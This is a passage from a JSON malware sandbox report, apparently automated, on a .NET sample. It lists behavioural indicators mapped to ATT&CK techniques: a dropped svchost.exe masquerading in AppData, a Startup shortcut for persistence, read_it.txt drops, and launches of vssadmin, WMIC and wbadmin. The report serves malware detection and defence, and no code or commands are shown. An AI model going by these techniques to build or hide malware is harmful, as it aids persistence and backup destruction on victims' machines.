"origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"svchost.exe\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"svchost.exe\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"svchost.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"svchost.exe\" - Location: [%APPDATA%\\svchost.exe]- [targetUID: 00000000-00005968]\n Dropped file: \"Internet Explorer.lnk\" - Location: [%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk]- [targetUID: 00000000-00005968]\n Dropped file: \"read_it.txt\" - Location: [%LOCALAPPDATA%\\Programs\\Python\\Python38-32\\Lib\\site-packages\\pkg_resources\\tests\\data\\my-test-package-source\\read_it.txt]- [targetUID: 00000000-00005968]\n Dropped file: \"svchost.url\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.url]- [targetUID: 00000000-00005968]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"vssadmin.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"WMIC.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"wbadmin.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"svchost.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.url\"\n \"svchost.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"cmd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" connecting to \"\\ThemeApiPort\"\n \"WMIC.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe.config\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mll,c\\\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.INI\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\read_it.txt\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe.Local\\\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe:Zone.Identifier\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\F0DC37BDA70CAA023D17F3858612D5FA922AEB27B3F151EA5EBCF83045FA52B2.EXE.CONFIG\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\FUSION.LOCALGAC\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\MLL,C\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\F0DC37BDA70CAA023D17F3858612D5FA922AEB27B3F151EA5EBCF83045FA52B2.INI\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC\\PUBLISHERPOLICY.TME\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\READ_IT.TXT\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" trying to access non-existent file \"C:\\F0DC37BDA70CAA023D17F3858612D5FA922AEB27B3F151EA5EBCF83045FA52B2.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"ATTRIBUTES\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"CALLFORATTRIBUTES\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"RESTRICTEDATTRIBUTES\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSFORDISPLAY\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"HIDEFOLDERVERBS\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"USEDROPHANDLER\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: 